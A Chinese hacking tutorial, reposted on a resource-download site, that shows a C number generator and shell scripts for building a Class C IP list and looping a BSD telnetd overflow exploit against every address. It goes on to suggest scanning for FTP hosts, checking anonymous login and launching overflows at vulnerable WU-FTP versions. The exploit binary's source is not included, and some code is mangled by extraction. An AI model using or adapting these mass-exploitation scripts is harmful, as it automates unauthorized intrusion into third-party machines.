关于扫描的技巧与实战
面我们就以一个简单的扫描一个C类IP里BSDTELNET漏洞机器为例子来看看:$cat num.cmain(){ int x; for (x=0;x<256;x ) printf ("%d\\n",x);}上面这段C我想不用我多说了吧,他生成一个C类网的网络号,大家在编译后可以./num >>num.txt来得到这个文本.#!/bin/sh echo -n "please ernter a ip:" read ipip list=`cat num.txt` for listip in $list do echo $ipip.$listipecho >>iplist.txt $ipip.$listip done上面这段我们来说说,read ipip是接受键盘的信息,用来给你输入1.1.1这样一个C段地址以便与下面的LISTIP合并成真正的ip,list=\’cat num.txt\’是读取我们刚才生成的num.txt里1-254的网络号,for listip in $list是把刚才list里的num.txt内容循环读给listip,然后我们用echo $ipip.$listip就可以得到一个真正的ip了,再通过echo >>iplist.txt $ipip.$listip把最后得到的IP写到iplist.txt.通过以上步骤,我们得到了一个c类ip,下面我们就来用我们事先就有的bsdtelnet溢出代码来扫描他们了,如下:#!/bin/sh list=`cat iplist.txt` for listip in $list do ./bsdtelnet -c $listipdonelist=\’cat iplist.txt\’读取刚才我们生成的iplist.txt文本,for listip in $list把list里存放的ip循环送给listip, 看这个./bsdtelnet -c $listip,这个就是调用我们在当前这个SHELL所在的目录执行我们的exploit来对ip进行探测.全部结束,好了,细心的朋友可能发现了,这样的扫描似乎很慢,呵呵,确实,因为这样他不管23端口有没有开,不管对方机器是不是BSD的,他都要去溢出试试,在这里,我只是通过TOMYCHEN兄提供给大家一个巧妙利用SHELL的思路,具体大家可以自己发挥,比如先在SHELL里调用扫描器扫描,然后把开放有21端口的机器保存下面,然后再对开了21端口的机器进行验证看是否可匿名,得到会话返回消息,如果是WU-FTP260等,就可以再调用溢出程序进行测试呀等等.还是那句老话,技术最重要!———————————————– 作者:SysHunter
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 关于扫描的技巧与实战
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 织梦模板使用说明
- 你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html